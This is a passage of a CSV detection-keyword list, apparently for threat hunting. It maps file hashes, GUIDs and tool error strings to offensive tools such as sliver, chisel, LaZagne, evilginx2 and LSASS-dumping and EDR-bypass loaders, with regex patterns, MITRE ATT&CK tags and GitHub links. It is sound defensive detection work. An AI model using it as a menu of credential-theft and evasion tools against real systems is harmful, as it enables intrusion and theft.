"*f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d*",".{0,1000}f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd*",".{0,1000}f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6*",".{0,1000}f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76*",".{0,1000}f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928*",".{0,1000}f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5*",".{0,1000}f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4*",".{0,1000}f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb*",".{0,1000}f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde*",".{0,1000}f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45*",".{0,1000}f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*",".{0,1000}F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active 
Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*F90C57DF-CDE4-4CDE-A2B9-9124C307D53A*",".{0,1000}F90C57DF\-CDE4\-4CDE\-A2B9\-9124C307D53A.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023*",".{0,1000}f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb*",".{0,1000}f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc*",".{0,1000}f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a*",".{0,1000}f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*F93C99ED-28C9-48C5-BB90-DD98F18285A6*",".{0,1000}F93C99ED\-28C9\-48C5\-BB90\-DD98F18285A6.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225*",".{0,1000}f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730*",".{0,1000}f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3*",".{0,1000}f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive 
tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1*",".{0,1000}f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b*",".{0,1000}f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e*",".{0,1000}f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23*",".{0,1000}f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a*",".{0,1000}fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*FA0DAF13-5058-4382-AE07-65E44AFB5592*",".{0,1000}FA0DAF13\-5058\-4382\-AE07\-65E44AFB5592.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08*",".{0,1000}fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 
- TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb*",".{0,1000}fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21*",".{0,1000}fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255*",".{0,1000}fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913*",".{0,1000}fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831*",".{0,1000}fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9*",".{0,1000}fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Fadi002/unshackle*",".{0,1000}Fadi002\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*Fahrj/reverse-ssh*",".{0,1000}Fahrj\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*fail to retrieve SAM hashs!*",".{0,1000}fail\sto\sretrieve\sSAM\shashs!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Failed in m1n1dumpIT:*",".{0,1000}Failed\sin\sm1n1dumpIT\:.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*Failed to allocate memory for shellcode:*",".{0,1000}Failed\sto\sallocate\smemory\sfor\sshellcode\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to change shellcode memory protection*",".{0,1000}Failed\sto\schange\sshellcode\smemory\sprotection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to find rx section offset*",".{0,1000}Failed\sto\sfind\srx\ssection\soffset.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to hijack thread:*",".{0,1000}Failed\sto\shijack\sthread\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to overwrite the .text section of ntdll.dll*",".{0,1000}Failed\sto\soverwrite\sthe\s\.text\ssection\sof\sntdll\.dll.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*failed to shut down Tor -- possible bug in bine*",".{0,1000}failed\sto\sshut\sdown\sTor\s\-\-\spossible\sbug\sin\sbine.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*Failed to write shellcode to target process*",".{0,1000}Failed\sto\swrite\sshellcode\sto\starget\sprocess.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Fake Computer Objects Honey Pots*",".{0,1000}Fake\sComputer\sObjects\sHoney\sPots.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Fake Service Accounts Honey Tokens*",".{0,1000}Fake\sService\sAccounts\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*fake_ap.py*",".{0,1000}fake_ap\.py.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*fake_common_roots.txt*",".{0,1000}fake_common_roots\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework 